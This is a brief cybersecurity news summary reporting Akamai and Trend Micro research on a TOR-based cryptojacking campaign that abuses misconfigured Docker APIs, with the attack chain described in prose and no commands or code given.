Expanding TOR-Based Cryptojacking Attacks Exploit Misconfigured Docker APIs

Cybersecurity researchers have identified a new variant of a previously disclosed campaign that exploits the TOR network for cryptojacking attacks aimed at exposed Docker APIs. Akamai, which uncovered this recent activity last month, indicated that the campaign is designed to prevent other actors from accessing the Docker API over the internet. These findings build upon an earlier report from Trend Micro in late June 2025, which revealed a malicious campaign targeting exposed Docker instances to stealthily deploy an XMRig cryptocurrency miner via a TOR domain for anonymity. Security researcher Yonatan Gilvarg noted that this new strain appears to utilise similar tools to the original but may have a different objective, potentially laying the groundwork for a complex botnet.

The attack chain involves infiltrating misconfigured Docker APIs to execute a new container based on the Alpine Docker image while mounting the host file system. Following this, threat actors run a Base64-encoded payload to download a shell script from a .onion domain. This script not only modifies SSH configurations for persistence but also installs various tools, including Masscan, libpcap, libpcap-dev, zstd, and Torsocks, to conduct reconnaissance, establish contact with a command-and-control (C2) server, and download a compressed binary from another .onion domain. The initial file downloaded is a dropper written in Go, which contains the payload intended for deployment without communicating externally. Interestingly, the source code of the binary includes an emoji to represent logged-in users, suggesting it may have been developed using a large language model (LLM). 

Categories: Cryptojacking, Docker Security, Malware Propagation 

Tags: Cybersecurity, TOR Network, Cryptojacking, Docker APIs, Malicious Campaign, Botnet, Reconnaissance, Command-and-Control, Masscan, Remote Debugging